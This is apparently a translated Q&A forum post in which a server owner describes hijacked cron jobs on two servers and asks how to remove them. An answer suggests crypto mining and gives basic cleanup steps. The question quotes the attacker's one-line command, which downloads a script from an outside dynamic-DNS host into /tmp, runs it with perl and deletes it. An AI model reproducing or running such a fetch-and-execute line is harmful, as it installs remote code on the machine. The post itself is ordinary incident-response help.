我有两台专用服务器,几天前它们开始向我发送有关正在运行的未知 cron 作业的通知。
我在两台服务器上都拥有网站的辅助帐户,而黑客修改了这些帐户的 cron 作业,但并未修改 root 帐户的 cron 作业。因此我认为“可能”他们只拥有有限的访问权限。
两者都尝试运行以下命令:cd /tmp;wgethttp://fastfoodz.dlinkddns.com/abc.txt;curl-Ohttp://fastfoodz.dlinkddns.com/abc.txt;perlabc.txt;rm -f abc*
第一台服务器的 Cronjob 输出:
http://pastebin.com/m56ga6pp
第二台服务器的 Cronjob 输出:
http://pastebin.com/4utZ8agC
奇怪的是,这两台服务器似乎同时遭到黑客攻击,而且采用的方法也相同。
是否有人曾遇到过这种黑客攻击,可以告诉我他是如何进入的,以及我是否可以在不重新安装的情况下将其删除..?
服务器上有很多网站,第一个网站使用了大约 500GB 的空间,如果将其移动到其他地方并重新安装,将需要花费很多空间。
提前致谢!
答案1
从 pastebin 输出来看,cron 作业似乎正在尝试生成哈希值,我怀疑该人正试图将服务器用作加密货币挖矿池的一部分。
要了解他是如何进入的,我们需要各种日志,你 100% 确定这不是网站所有者干的吗?你可以用以下方法轻松删除 cronjob。
crontab -e
为了防止此人再次进入,如果特定用户没有理由拥有 shell 访问权限,我将禁用该用户。
chsh -s /sbin/nologin {username}